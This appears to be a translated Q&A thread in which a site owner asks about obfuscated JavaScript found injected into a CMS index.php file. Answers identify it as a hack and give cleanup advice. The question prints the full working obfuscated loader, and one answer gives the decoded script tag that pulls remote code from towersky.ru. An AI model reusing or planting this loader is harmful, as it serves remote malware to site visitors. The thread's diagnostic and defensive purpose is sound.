Странный Javascript в шаблоне.Это попытка взлома? - PullRequest
Новая
       2

Странный Javascript в шаблоне.Это попытка взлома?

8 голосов
/ 11 июня 2010

На прошлой неделе я проверил веб-сайт моего клиента на соответствие стандартам xHTML Strict 1.0 / CSS 2.1. Сегодня, когда я перепроверил, у меня была ошибка проверки, вызванная странным и ранее неизвестным скриптом. Я нашел это в файле index.php моей ExpressionEngine CMS. Это попытка взлома, как я и подозревал? Я не мог не заметить русский домен, закодированный в скрипте ...

Что делает этот javascript? Мне нужно объяснить специфические опасности моему клиенту. 




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
                Fp=VU[u](A);
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo');
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0];
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp);
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y;
    cU=["Yr","gv"];

Ответы [ 4 ]

14 голосов
/ 11 июня 2010

Да. Сайт был взломан.

Что вам нужно сделать, это:

  1. Убедитесь, что все, кто имел доступ к этим паролям, запускают обновленное virusscan на компьютерах, с которых они могли войти на сайт.
  2. Убедитесь, что вы изменили все логин и пароль администратора.
  3. Если возможно, вам, вероятно, следует вернуться к базе кода, как это было до того, как вы натолкнулись на это.
  4. Проверьте время модификации скрипта, в котором вы нашли этот фрагмент (если не слишком поздно), и найдите другие файлы, которые были изменены за это время. Сценарий, скорее всего, генерируется случайным образом, поэтому поиск его частей вряд ли будет окончательным.

Если этот сценарий смог найти свой путь, то могут и другие. Нередки случаи, когда веб-сайты подвергаются риску с помощью троянов кейлоггинга на компьютерах тех, кто в них входит.
См http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity

11 голосов
/ 11 июня 2010

Приведенный выше код записывает некоторый код, который активирует код на русском сайте (http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php),, который добавляет невидимый DIV, содержащий iFrame, который, я полагаю, содержит изображение щенка.

4 голосов
/ 11 июня 2010

Сценарий в основном добавляет следующую строку к закрывающему тегу тела: 

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>

Итак, он пытается загрузить внешний скрипт на ваш сайт.Я не уверен в том, что делает этот скрипт, но, без сомнения, это не что-то приятное.

Кроме того, быстрый поиск "towersky.ru" в Google показывает списки вредоносных сайтов, содержащих этот сайт.

2 голосов
/ 11 июня 2010

Учитывая, что я не могу даже загрузить эту страницу в Windows, потому что мой AV остановил меня, да, это вирус.

...